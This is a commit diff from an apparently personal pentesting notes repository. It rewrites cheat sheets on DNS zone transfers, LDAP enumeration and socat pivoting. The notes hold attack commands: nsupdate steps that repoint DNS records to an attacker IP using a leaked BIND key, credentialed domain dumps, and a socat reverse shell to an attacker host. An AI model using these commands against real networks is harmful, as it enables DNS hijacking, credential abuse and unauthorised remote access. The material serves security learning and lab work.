whx
/
killchain-compendium
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

clean up and rewrite

This commit is contained in:
whackx 2023-08-09 21:50:10 +02:00
parent 74e0c3e76a
commit 0f1b59e80f
4 changed files with 90 additions and 34 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

43
Enumeration/:w Normal file
View File

@ -0,0 +1,43 @@
# DNS
## Subdomain Enumeration
* Get all the info via
```sh
dig @$TARGET_DNS $DOMAIN axfr
drill @$TARGET_DNS $DOMAIN axfr
```
There is also [subrake](https://github.com/hash3liZer/Subrake.git) for sudbdomain enumeration.
A Subdomain Enumeration and Validation tool for Bug Bounty and Pentesters.
## Join a Domain
Join a windows domain by setting the A record to the attacker's IP, needs cert and Pk
```sh
nsupdate
server <DNS-IP>
update delete <sub.domain.com>
update add <sub.domain.com> 1234 A $ATTACKER_IP
send
quit
```
Afterwards, check the domain by querying the subdomain's A record via dig/drill/nslookup.
### Found Secrets for Keys
Sometimes secrets can be found secret like a key, for example in `/etc/bind/named.conf`. This secret can be used to join the domain.
```sh
nsupdate -d -y <hash algorithm>:<name of the key>:<secret>
Creating key...
namefromtext
keycreate
server <domain>
update add <subdomain>.<toplevel-domain>. 86400 IN A $ATTACKER_IP
send
```
*Hint:* Copy the lines, every space counts as it has to be exactly like in the example

14
Enumeration/DNS.md
View File

@ -8,12 +8,12 @@ dig @$TARGET_DNS $DOMAIN axfr
drill @$TARGET_DNS $DOMAIN axfr drill @$TARGET_DNS $DOMAIN axfr
``` ```
* [subrake](https://github.com/hash3liZer/Subrake.git) There is also [subrake](https://github.com/hash3liZer/Subrake.git) for sudbdomain enumeration.
A Subdomain Enumeration and Validation tool for Bug Bounty and Pentesters.
## Join a Domain ## Join a Domain
* Join a windows domain by setting the A record to the attacker's IP, needs cert and Pk Join a windows domain by setting the A record to the attacker's IP, needs cert and Pk
```sh ```sh
nsupdate nsupdate
server <DNS-IP> server <DNS-IP>
@ -22,11 +22,11 @@ update add <sub.domain.com> 1234 A $ATTACKER_IP
send send
quit quit
``` ```
* Check domain by querying the subdomain's A record via dig/drill/nslookup Afterwards, check the domain by querying the subdomain's A record via dig/drill/nslookup.
### Found Secrets for Keys ### Found Secrets for Keys
If there is the possiblity of found secret for a key, for example in `/etc/bind/named.conf` then this secret can be used to join the domain. Sometimes secrets can be found secret like a key, for example in `/etc/bind/named.conf`. This secret can be used to join the domain.
```sh ```sh
nsupdate -d -y <hash algorithm>:<name of the key>:<secret> nsupdate -d -y <hash algorithm>:<name of the key>:<secret>
Creating key... Creating key...
@ -34,10 +34,10 @@ namefromtext
keycreate keycreate
server <domain> server <domain>
update add mail.snoopy.htb. 86400 IN A $ATTACKER_IP update add <subdomain>.<toplevel-domain>. 86400 IN A $ATTACKER_IP
send send
``` ```
Copy the lines, every space counts as it has to be exactly like in the example *Hint*: Copy the lines, every space counts as it has to be exactly like in the example

5
Enumeration/LDAP.md
View File

@ -2,6 +2,7 @@
## Get Domain ## Get Domain
Use the `ldapsearch` tool to receive information from an LDAP server.
```sh ```sh
ldapsearch -H ldap://$TARGET_IP -x -s base namingcontexts ldapsearch -H ldap://$TARGET_IP -x -s base namingcontexts
``` ```
@ -16,8 +17,8 @@ ldapsearch -H ldap://$TARGET_IP -x -b 'DC=<DC>,DC=<ORG>' -D '<DC>\<user>' -W > o
## Domain Dump ## Domain Dump
* If a set of credentials are known via If a set of LDAP credentials is known dump the domain via
```sh ```sh
ldapdomaindump $TARGET_IP -u '<domain>\<user>' -p '<password>' --no-json --no-grep ldapdomaindump $TARGET_IP -u '<domain>\<user>' -p '<password>' --no-json --no-grep
``` ```
* Take a look at the genreated HTML files The result is a set of HTML files, take a look at them.

62
Post Exploitation/Pivoting.md
View File

@ -92,37 +92,49 @@ echo y | &.\plink.exe -ssh -l <MYUSERNAME> -pw <MYPASSWORD> -R <MYIP>:<MYPORT>:1
### Socat ### Socat
#### Local PortForwarding via Socat
Open a local port (here 80) on a network interface
```sh
./socat TCP4-LISTEN:8080,fork TCP4:127.0.0.1:80
```
#### Open a reverse shell via Socat
* Reverse shell on target via * Reverse shell on target via
```sh ```sh
./socat tcp-l:8000 tcp:<attacker-IP>:443 & ./socat tcp-l:8000 tcp:<attacker-IP>:443 &
``` ```
* Attacking bind shell * Attacking bind shell on attacker
```sh ```sh
sudo nc -lvnp 443 sudo nc -lvnp 443
``` ```
* Relay on jumpserver via #### Jumpserver via Socat
```sh
./socat tcp-l:33060,fork,reuseaddr tcp:<TargetIP>:3306 &
```
* Quiet Port Forwarding * Relay on a jumpserver via
* On attacker ```sh
```sh ./socat tcp-l:33060,fork,reuseaddr tcp:<TargetIP>:3306 &
socat tcp-l:8001 tcp-l:8000,fork,reuseaddr & ```
```
* On relay server
```sh
./socat tcp:<attacker-IP>:8001 tcp:<TargetIP>:<TargetPort>,fork &
```
* Open `localhost:8000`
* Processes are backgrounded via `&`. Therefore, the process can be quit by using the corresponding bg number like `kill %1`. #### Quiet Port Forwarding Through a Relay Server via Socat
* On attacker
```sh
socat tcp-l:8001 tcp-l:8000,fork,reuseaddr &
```
* On relay server
```sh
./socat tcp:<attacker-IP>:8001 tcp:<TargetIP>:<TargetPort>,fork &
```
__Notes__: Open `localhost:8000` on the attacker's browser or curl it afterwards. Processes are backgrounded via `&`. Therefore, the process can be quit by using the corresponding bg number like `kill %1`.
#### Forward Local Port via Socat
* In need of a Download on target, expose a port on the attacker via relay * In need of a Download on target, expose a port on the attacker via relay
```sh ```sh
socat tcp-l:80,fork tcp:$ATTACKER_IP:80 socat tcp-l:80,fork tcp:$ATTACKER_IP:80
``` ```
### Chisel ### Chisel